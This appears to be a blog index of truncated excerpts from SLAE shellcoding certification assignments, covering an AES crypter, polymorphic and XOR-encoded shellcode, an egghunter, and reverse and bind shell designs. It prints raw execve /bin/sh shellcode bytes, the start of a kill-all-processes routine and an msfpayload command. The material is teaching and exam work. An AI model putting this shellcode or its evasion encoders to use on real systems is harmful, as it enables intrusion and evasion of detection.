danielsauder

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption. Here is the code for encryption: encode.py from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new(‘Passphrase123456’, AES.MODE_CBC, ‘IVIVIVIVIVI12345’) l=len(plain) r=l%16 p=16-r print "offset: "…

This assignment is about writing polymorphic versions of shellcodes downloaded by shell-storm.org. Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php. Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax…

Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I choosed the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd=”ls” R | ndisasm -u – it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx…

This one is about building a custom encoder and decoder. For this I used an insertion / XOR encoder, that splits the shellcode into bytes and inserts a random value. Further the shellcode is decoded using xor with the random value. This way, we have a shellcode, that has nothing to do with the original…

This assignment is about writing a working demo of an egghunter. An egghunter code is basically a piece of code that is searching for a code word (the egg) in the memory. When the egg was found, the egghunter code jumps to the address behind the egg and executes the code at this address. For…

What it is about: •  Create a Shell_Reverse_TCP shellcode – Reverse connects to configured IP and Port – Execs shell on successful connection •  IP and Port should be easily configurable Here is the C code I used for prototyping the assembler code: reverseshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) {…

What it is about: •  Create a Shell_Bind_TCP shellcode – Binds to a port – Execs Shell on incoming connection •  Port number should be easily configurable Here is the C code for the bind shell, I used it for modelling the assembler code: bindshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void)…

This blog was created mainly for my SLAE certification. More profiles: Blog in german Twitter Xing profile GIT